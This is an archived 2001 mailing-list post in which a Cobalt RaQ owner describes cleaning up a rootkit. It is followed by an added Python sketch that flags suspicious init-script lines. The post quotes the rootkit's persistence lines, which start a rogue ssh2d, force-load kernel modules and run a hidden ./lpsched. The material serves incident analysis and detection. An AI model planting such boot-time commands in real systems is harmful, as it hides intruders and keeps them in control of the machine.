[cobalt-users] Recent Hacks (resolution in sight)
- Subject: [cobalt-users] Recent Hacks (resolution in sight)
- From: "inc" <inc@xxxxxxxxxxxxx>
- Date: Fri Feb 9 03:44:06 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
thanks to those who maintained email with me today; it's been a great help.
here's my report:
i've successfully (touch wood) used the unhack.pl script recommended by
Steve Bassi via Mike Fritsch.
after running unhack.pl, there's one file that unhack said was neither
hacked (according to its internal MD5 checksums) nor "original" cobalt.
this file, /etc/rc.d/init.d/network contains the following which i would say
is part of the hack.
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
;;
i've not installed ssh2d, and crth.o and crtz.o look damned nasty to me.
note that unhack.pl DOESN'T clear up crtz.o. can anyone shed some light on
the remaining commands there? i've disabled all these lines until i know
what they are. my "network" script was considerably more complicated than
the "network" script included with unhack.tar.gz
i also spent the whole day studying up on cracking and studying the scripts
and binaries that were placed on my raq.
the only weird thing i could find in my logs was an ftp login from korea. i
have not published any ftp site urls anywhere, and this is the only ftp
login i've ever seen in the logs apart from my own, and the 127.0.0.1
entries used by the admin. this ftp login occurred 4 hours before the
rootkit was activated.
so i would think that proftpd was exploited to gain root access.
all log entries bar the ftp one above were cleaned up, but there were
footsteps left behind in /.bash_history which reflected an rcp download from
a us .edu site.
at this point ps, su, all manner of executables are replaced to hide any
unusual activity. flash22 suggested i try "top" -- which lo and behold
turned up all my logins running as "/bin/xlogin" -- which appeared to be a
copy of the original cobalt "/bin/login" .. a file /etc/ld.so.hash seems to
have a crypted password in it. the replaced "/bin/login" was a very small
file next to the original cobalt "/bin/login".
i'm happy to answer any questions on this.
thanks again to those who helped me climb out of the black hole!
--
chris paul
fastmedia.net
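As an added illustration (not part of the original post or of unhack.pl), the following Python sketch reproduces the two checks the report relies on: an unhack.pl-style MD5 verdict of "original", "hacked" or "unknown", and a line-by-line review of an "unknown" init script for the kinds of lines the post flags (kernel modules loaded from /usr/lib, hidden dot-directories, executables run straight out of /usr/lib). The baseline hashes are constructed placeholders; the sample script is the fragment quoted above.

```python
import hashlib
import re

# Constructed sample input: the fragment of /etc/rc.d/init.d/network quoted in the post.
SUSPECT_SCRIPT = """\
/usr/bin/ssh2d -q
if test -f "/dev/kmod"; then
/sbin/insmod -f /usr/lib/crth.o
/sbin/insmod -f /usr/lib/crtz.o
fi
if test -f /lib/security/.config/sn ; then
cd /lib/security/.config;./lpsched
fi
touch /var/lock/subsys/network
if test -f "/dev/dos"; then
/usr/lib/lpq
fi
"""

# Constructed baseline (placeholders): a real check loads the vendor MD5s of pristine
# files and the MD5s of known rootkit-modified copies, which is what unhack.pl compares.
KNOWN_ORIGINAL = {hashlib.md5(b"touch /var/lock/subsys/network\n").hexdigest()}
KNOWN_HACKED = {hashlib.md5(b"/usr/bin/ssh2d -q\n").hexdigest()}

def classify(content: bytes, original=KNOWN_ORIGINAL, hacked=KNOWN_HACKED) -> str:
    """unhack.pl-style verdict: 'original', 'hacked', or 'unknown' (review by hand)."""
    digest = hashlib.md5(content).hexdigest()
    if digest in original:
        return "original"
    return "hacked" if digest in hacked else "unknown"

HIDDEN_DIR = re.compile(r"/\.[A-Za-z0-9_]+")  # e.g. /lib/security/.config

def line_reasons(line: str) -> list:
    """Heuristics taken from the post for things a stock init script should not do."""
    reasons = []
    for cmd in line.split(";"):
        tokens = cmd.split()
        if not tokens:
            continue
        if tokens[0].endswith("insmod") and any(
                t.endswith(".o") and not t.startswith("/lib/modules/") for t in tokens[1:]):
            reasons.append("kernel module loaded from outside /lib/modules")
        if tokens[0].startswith("/usr/lib/"):
            reasons.append("executable run directly from /usr/lib")
    if HIDDEN_DIR.search(line):
        reasons.append("hidden dot-directory referenced")
    return reasons

def suspicious_lines(script: str) -> list:
    """Return (line_number, line, reasons) for every line that trips a heuristic."""
    return [(n, line, line_reasons(line))
            for n, line in enumerate(script.splitlines(), 1) if line_reasons(line)]
```

Running suspicious_lines(SUSPECT_SCRIPT) flags lines 3, 4, 6, 7 and 11 of the fragment, which matches the lines the post singles out; ssh2d on line 1 is only catchable by comparing against the list of daemons you actually installed.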